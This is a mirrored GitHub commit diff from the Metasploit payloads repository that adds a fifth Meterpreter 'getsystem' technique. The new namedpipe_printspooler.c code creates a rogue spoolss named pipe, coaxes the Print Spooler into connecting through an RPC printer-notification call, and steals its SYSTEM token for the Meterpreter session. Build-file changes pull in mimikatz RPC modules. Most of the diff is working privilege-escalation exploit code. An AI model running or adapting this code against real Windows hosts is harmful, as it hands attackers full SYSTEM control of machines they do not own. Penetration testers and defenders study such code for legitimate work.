github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-26 17:41:08 +01:00
Code Releases Activity

Land #509, Metasploit-side logic to support a 5th getsystem mechanism

Browse Source 
Merge branch 'land-509' into upstream-master
This commit is contained in:
bwatters-r7 2022-01-21 17:50:29 -06:00
commit 2b607061c5
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
10 changed files with 335 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
c/meterpreter/source/extensions/priv/elevate.c
View File

@ -6,6 +6,7 @@
#include "common_metapi.h"
#include "namedpipe.h"
#include "namedpipe_rpcss.h"
#include "namedpipe_printspooler.h"
#include "tokendup.h"
/*!
@ -115,6 +116,14 @@ DWORD elevate_getsystem( Remote * remote, Packet * packet )
}
}
if (dwTechnique == ELEVATE_TECHNIQUE_ANY || dwTechnique == ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER) {
dprintf("[ELEVATE] Attempting ELEVATE_TECHNIQUE_PRINTSPOOLER_NAMEDPIPE (%u)", ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER);
if ( ( dwResult = elevate_via_namedpipe_printspooler(remote, packet)) == ERROR_SUCCESS) {
dwTechnique = ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER;
break;
}
}
} while( 0 );
if( response )

1
c/meterpreter/source/extensions/priv/elevate.h
View File

@ -11,6 +11,7 @@
#define ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 2 ///< Identifier for the Named Pipe service technique (#2)
#define ELEVATE_TECHNIQUE_SERVICE_TOKENDUP 3 ///< Identifier for the Token Duplication service technique.
#define ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE_RPCSS 4 ///< Identifier for the Named Pipe service technique (RPCSS variant)
#define ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER 5 ///< Identifier for the Named Pipe technique (PrintSpooler variant)
typedef void (WINAPI * GETNATIVESYSTEMINFO)( LPSYSTEM_INFO lpSystemInfo ); ///< Stolen from ps.h

8
c/meterpreter/source/extensions/priv/namedpipe.c
View File

@ -7,13 +7,13 @@
* A post-impersonation callback that simply updates the meterpreter token to the
* current thread token. This is used by the standard service-based technique.
*/
DWORD post_callback_use_self(Remote * remote)
DWORD set_meterp_thread_use_current_token(Remote * remote)
{
HANDLE hToken = NULL;
// get a handle to this threads token
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken)) {
dprintf("[ELEVATE] post_callback_use_self. OpenThreadToken failed");
dprintf("[ELEVATE] set_meterp_thread_use_current_token. OpenThreadToken failed");
return GetLastError();
}
@ -164,7 +164,7 @@ DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
"cmd.exe /c echo %s > %s", cpServiceName, cServicePipe);
hSem = CreateSemaphore(NULL, 0, 1, NULL);
PostImpersonation.pCallback = post_callback_use_self;
PostImpersonation.pCallback = set_meterp_thread_use_current_token;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, hSem, &PostImpersonation);
@ -304,7 +304,7 @@ DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
}
hSem = CreateSemaphore(NULL, 0, 1, NULL);
PostImpersonation.pCallback = post_callback_use_self;
PostImpersonation.pCallback = set_meterp_thread_use_current_token;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, hSem, &PostImpersonation);

1
c/meterpreter/source/extensions/priv/namedpipe.h
View File

@ -5,6 +5,7 @@ typedef DWORD(*PostImpersonationCallback)(LPVOID);
DWORD THREADCALL elevate_namedpipe_thread(THREAD* thread);
DWORD elevate_via_service_namedpipe(Remote* remote, Packet* packet);
DWORD elevate_via_service_namedpipe2(Remote* remote, Packet* packet);
DWORD set_meterp_thread_use_current_token(Remote* remote);
typedef struct _PRIV_POST_IMPERSONATION {
PostImpersonationCallback pCallback;

260
c/meterpreter/source/extensions/priv/namedpipe_printspooler.c Normal file
View File

@ -0,0 +1,260 @@
#include "precomp.h"
#include "common_metapi.h"
#include "namedpipe.h"
typedef void* PRINTER_HANDLE;
typedef wchar_t* STRING_HANDLE;
typedef struct _DEVMODE_CONTAINER {
DWORD cbBuf;
BYTE* pDevMode;
} DEVMODE_CONTAINER;
DWORD RpcOpenPrinter(STRING_HANDLE pPrinterName, PRINTER_HANDLE* pHandle, wchar_t* pDatatype, DEVMODE_CONTAINER* pDevModeContainer, DWORD AccessRequired);
DWORD RpcClosePrinter(PRINTER_HANDLE* phPrinter);
DWORD RpcRemoteFindFirstPrinterChangeNotification(PRINTER_HANDLE hPrinter, DWORD fdwFlags, DWORD fdwOptions, wchar_t* pszLocalMachine, DWORD dwPrinterLocal, DWORD cbBuffer, BYTE* pBuffer);
typedef NTSTATUS(WINAPI* PRtlGetVersion)(LPOSVERSIONINFOEXW);
DWORD WINAPI trigger_printer_connection(LPWSTR pPipeName);
DWORD elevate_via_namedpipe_printspooler(Remote* remote, Packet* packet)
{
DWORD dwResult = ERROR_SUCCESS;
THREAD* pThread = NULL;
HANDLE hSem = NULL;
char cPipeName1[MAX_PATH] = { 0 };
WCHAR cPipeName2[MAX_PATH] = { 0 };
DWORD dwPipeUid[2] = { 0, 0 };
OSVERSIONINFOEXW os = { 0 };
HMODULE hNtdll = NULL;
PRtlGetVersion pRtlGetVersion = NULL;
PRIV_POST_IMPERSONATION PostImpersonation;
do {
hNtdll = GetModuleHandleA("ntdll");
if (hNtdll == NULL) {
BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: Failed to resolve RtlGetVersion");
}
pRtlGetVersion = (PRtlGetVersion)GetProcAddress(hNtdll, "RtlGetVersion");
if (pRtlGetVersion == NULL) {
BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: Failed to resolve RtlGetVersion");
}
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXW);
if (pRtlGetVersion(&os)) {
BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: RtlGetVersion failed");
}
// Works on 2016/8.1+
if (os.dwMajorVersion < 6 || (os.dwMajorVersion == 6 && os.dwMinorVersion < 3)) {
SetLastError(ERROR_CALL_NOT_IMPLEMENTED);
BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: Windows version not supported.")
}
// generate a pseudo random name for the pipe
dwPipeUid[0] = ((rand() << 16) | rand());
dwPipeUid[1] = ((rand() << 16) | rand());
_snprintf_s(cPipeName1, sizeof(cPipeName1), MAX_PATH, "\\\\.\\pipe\\%08x%08x\\pipe\\spoolss", dwPipeUid[0], dwPipeUid[1]);
_snwprintf_s(cPipeName2, sizeof(cPipeName2), MAX_PATH, L"%08x%08x", dwPipeUid[0], dwPipeUid[1]);
hSem = CreateSemaphore(NULL, 0, 1, NULL);
PostImpersonation.pCallback = set_meterp_thread_use_current_token;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cPipeName1, hSem, &PostImpersonation);
if (!pThread) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler. met_api->thread.create failed",
ERROR_INVALID_HANDLE);
}
if (!met_api->thread.run(pThread)) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler. met_api->thread.run failed",
ERROR_ACCESS_DENIED);
}
// wait for the thread to create the pipe, if it times out terminate
if (hSem) {
if (WaitForSingleObject(hSem, 500) != WAIT_OBJECT_0) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler. WaitForSingleObject failed",
ERROR_ACCESS_DENIED);
}
}
else {
Sleep(500);
}
trigger_printer_connection(cPipeName2);
// signal our thread to terminate if it is still running
met_api->thread.sigterm(pThread);
// and wait for it to terminate...
met_api->thread.join(pThread);
// get the exit code for our pthread
dprintf("[ELEVATE] dwResult before exit code: %u", dwResult);
if (!GetExitCodeThread(pThread->handle, &dwResult)) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler. GetExitCodeThread failed",
ERROR_INVALID_HANDLE);
}
dprintf("[ELEVATE] dwResult after exit code: %u", dwResult);
} while (0);
if (pThread) {
met_api->thread.destroy(pThread);
}
if (hSem) {
CloseHandle(hSem);
}
return dwResult;
}
DWORD WINAPI trigger_printer_connection(LPWSTR pPipeName)
{
PRINTER_HANDLE hPrinter = NULL;
DEVMODE_CONTAINER devModeContainer = { 0 };
LPWSTR pComputerName = NULL;
DWORD dwComputerNameLen = MAX_COMPUTERNAME_LENGTH + 1;
LPWSTR pPrinterName = NULL;
LPWSTR pCaptureServer = NULL;
DWORD dwResult = ERROR_SUCCESS;
do
{
pComputerName = (LPWSTR)malloc(dwComputerNameLen * sizeof(WCHAR));
if (!pComputerName)
{
BREAK_ON_ERROR("[ELEVATE] Out of Memory");
}
if (!GetComputerNameW(pComputerName, &dwComputerNameLen))
{
BREAK_ON_ERROR("[ELEVATE] GetComputerNameW failed");
}
pPrinterName = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
if (!pPrinterName)
{
BREAK_ON_ERROR("[ELEVATE] Out of Memory");
}
pCaptureServer = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
if (!pCaptureServer)
{
BREAK_ON_ERROR("[ELEVATE] Out of Memory");
}
_snwprintf_s(pPrinterName, MAX_PATH, _TRUNCATE, (LPWSTR)(L"\\\\%s"), pComputerName);
_snwprintf_s(pCaptureServer, MAX_PATH, _TRUNCATE, (LPWSTR)(L"\\\\localhost/pipe/%s"), pPipeName);
RpcTryExcept
{
if (RpcOpenPrinter(pPrinterName, &hPrinter, NULL, &devModeContainer, 0) == RPC_S_OK)
{
RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ADD_JOB, 0, pCaptureServer, 0, 0, NULL);
RpcClosePrinter(&hPrinter);
}
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
BREAK_WITH_ERROR("[ELEVATE] Out of Memory", RpcExceptionCode());
}
RpcEndExcept;
} while (0);
if (pComputerName)
{
free(pComputerName);
}
if (pPrinterName)
{
free(pPrinterName);
}
if (pCaptureServer)
{
free(pCaptureServer);
}
if (hPrinter)
{
RpcClosePrinter(&hPrinter);
}
return 0;
}
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
return((void __RPC_FAR*) malloc(cBytes));
}
void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
free(p);
}
const RPC_WSTR MS_RPRN_UUID = (RPC_WSTR)L"12345678-1234-ABCD-EF00-0123456789AB";
const RPC_WSTR InterfaceAddress = (RPC_WSTR)L"\\pipe\\spoolss";
// Taken from https://github.com/Paolo-Maffei/OpenNT/blob/master/printscan/print/spooler/spoolss/win32/bind.c#L65
handle_t __RPC_USER STRING_HANDLE_bind(STRING_HANDLE lpStr)
{
RPC_STATUS RpcStatus;
RPC_WSTR StringBinding;
handle_t BindingHandle;
WCHAR ServerName[MAX_PATH + 1];
DWORD i;
if (lpStr && lpStr[0] == L'\\' && lpStr[1] == L'\\') {
// We have a servername
ServerName[0] = ServerName[1] = '\\';
i = 2;
while (lpStr[i] && lpStr[i] != L'\\' && i < sizeof(ServerName)) {
ServerName[i] = lpStr[i];
i++;
}
ServerName[i] = 0;
}
else {
return FALSE;
}
RpcStatus = RpcStringBindingComposeW(
MS_RPRN_UUID,
(RPC_WSTR)L"ncacn_np",
(RPC_WSTR)ServerName,
InterfaceAddress,
NULL,
&StringBinding);
if (RpcStatus != RPC_S_OK) {
return(0);
}
RpcStatus = RpcBindingFromStringBindingW(StringBinding, &BindingHandle);
RpcStringFreeW(&StringBinding);
if (RpcStatus != RPC_S_OK) {
return(0);
}
return(BindingHandle);
}
void __RPC_USER STRING_HANDLE_unbind(STRING_HANDLE lpStr, handle_t BindingHandle)
{
RPC_STATUS RpcStatus;
RpcStatus = RpcBindingFree(&BindingHandle);
return;
}

6
c/meterpreter/source/extensions/priv/namedpipe_printspooler.h Normal file
View File

@ -0,0 +1,6 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_SERVER_ELEVATE_TECHNIQUES_NAMEDPIPE_PRINTSPOOLER_H
#define _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_SERVER_ELEVATE_TECHNIQUES_NAMEDPIPE_PRINTSPOOLER_H
DWORD elevate_via_namedpipe_printspooler(Remote* remote, Packet* packet);
#endif

0
c/meterpreter/source/extensions/priv/namedpipe_rpcss.c Executable file → Normal file
View File

0
c/meterpreter/source/extensions/priv/namedpipe_rpcss.h Executable file → Normal file
View File

38
c/meterpreter/workspace/ext_server_priv/CMakeLists.txt
View File

@ -10,15 +10,51 @@ add_definitions(
if(MSVC)
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} /MP")
else()
add_definitions(
'-D_WIN32_WINNT=0x601'
'-D__deref=SAL__deref'
'-D__deref_opt_bcount=SAL__deref_opt_bcount'
'-D__deref_opt_out_bcount=SAL__deref_opt_out_bcount'
'-D__deref_opt_out_opt=SAL__deref_opt_out_opt'
'-D__deref_out=SAL__deref_out'
'-D__deref_out_bcount=SAL__deref_out_bcount'
'-D__deref_out_bcount_opt=SAL__deref_out_bcount_opt'
'-D__deref_out_bcount_full=SAL__deref_out_bcount_full'
'-D__deref_out_ecount_full=SAL__deref_out_ecount_full'
'-D__field_bcount=DISCARD'
'-D__field_ecount=DISCARD'
'-D__field_xcount=DISCARD'
'-D__in_bcount_opt=SAL__in_bcount_opt'
'-D__in_ecount_opt=SAL__in_ecount_opt'
'-D__in_ecount_opt=SAL__in_ecount_opt'
'-D__format_string=SAL__format_string'
'-D__in_z='
'-D__inout_bcount_opt=SAL__inout_bcount_opt'
'-D__inout_bcount_part_opt=SAL__inout_bcount_part_opt'
'-D__out_bcount_full_opt=SAL__out_bcount_full_opt'
'-D__out_bcount_opt=SAL__out_bcount_opt'
'-D__out_bcount_part_opt=SAL__out_bcount_part_opt'
'-D__out_ecount_opt=SAL__out_ecount_opt'
'-D__out_xcount_opt=SAL__out_bcount_opt'
'-D__range=DISCARD2'
'-D__reserved=SAL__reserved'
'-D__success=DISCARD'
'-D__FUNCTION__=""'
'-D__struct_bcount=DISCARD'
)
endif()
include_directories(../../source/common)
include_directories(../../source/ReflectiveDLLInjection/common)
include_directories(../../source/extensions/kiwi/mimikatz/inc)
include_directories(../../source/extensions/kiwi/mimikatz/modules/rpc)
set(SRC_DIR ../../source/extensions/priv)
file(GLOB SRC_FILES
${SRC_DIR}/*.c
${MOD_DEF_DIR}/extension.def
../../source/extensions/kiwi/mimikatz/modules/rpc/kull_m_rpc_ms-rprn.c
)
add_library(${PROJECT_NAME} SHARED ${SRC_FILES})
set_target_properties(${PROJECT_NAME} PROPERTIES OUTPUT_NAME ${PROJECT_NAME}.${TARGET_ARCH})
@ -27,7 +63,7 @@ if(MSVC)
set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE)
endif()
set(LINK_LIBS psapi)
set(LINK_LIBS psapi rpcrt4)
target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
if(MSVC)
target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")

30
c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
View File

@ -128,7 +128,7 @@
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -152,7 +152,7 @@
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DelayLoadDLLs>
@ -194,7 +194,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -218,7 +218,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DelayLoadDLLs>
@ -260,7 +260,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -284,7 +284,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DelayLoadDLLs>
@ -326,7 +326,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -349,7 +349,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalLibraryDirectories>
</AdditionalLibraryDirectories>
@ -392,7 +392,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\extensions\kiwi\mimikatz\modules\rpc;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -415,7 +415,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalLibraryDirectories>
</AdditionalLibraryDirectories>
@ -458,7 +458,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -481,7 +481,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalLibraryDirectories>
</AdditionalLibraryDirectories>
@ -521,10 +521,12 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\rpc\kull_m_rpc_ms-rprn.h" />
<ClInclude Include="..\..\source\extensions\priv\defs.h" />
<ClInclude Include="..\..\source\extensions\priv\elevate.h" />
<ClInclude Include="..\..\source\extensions\priv\fs.h" />
<ClInclude Include="..\..\source\extensions\priv\namedpipe.h" />
<ClInclude Include="..\..\source\extensions\priv\namedpipe_printspooler.h" />
<ClInclude Include="..\..\source\extensions\priv\namedpipe_rpcss.h" />
<ClInclude Include="..\..\source\extensions\priv\passwd.h" />
<ClInclude Include="..\..\source\extensions\priv\precomp.h" />
@ -533,9 +535,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClInclude Include="..\..\source\extensions\priv\tokendup.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\rpc\kull_m_rpc_ms-rprn.c" />
<ClCompile Include="..\..\source\extensions\priv\elevate.c" />
<ClCompile Include="..\..\source\extensions\priv\fs.c" />
<ClCompile Include="..\..\source\extensions\priv\namedpipe.c" />
<ClCompile Include="..\..\source\extensions\priv\namedpipe_printspooler.c" />
<ClCompile Include="..\..\source\extensions\priv\namedpipe_rpcss.c" />
<ClCompile Include="..\..\source\extensions\priv\passwd.c" />
<ClCompile Include="..\..\source\extensions\priv\priv.c" />
@ -546,4 +550,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>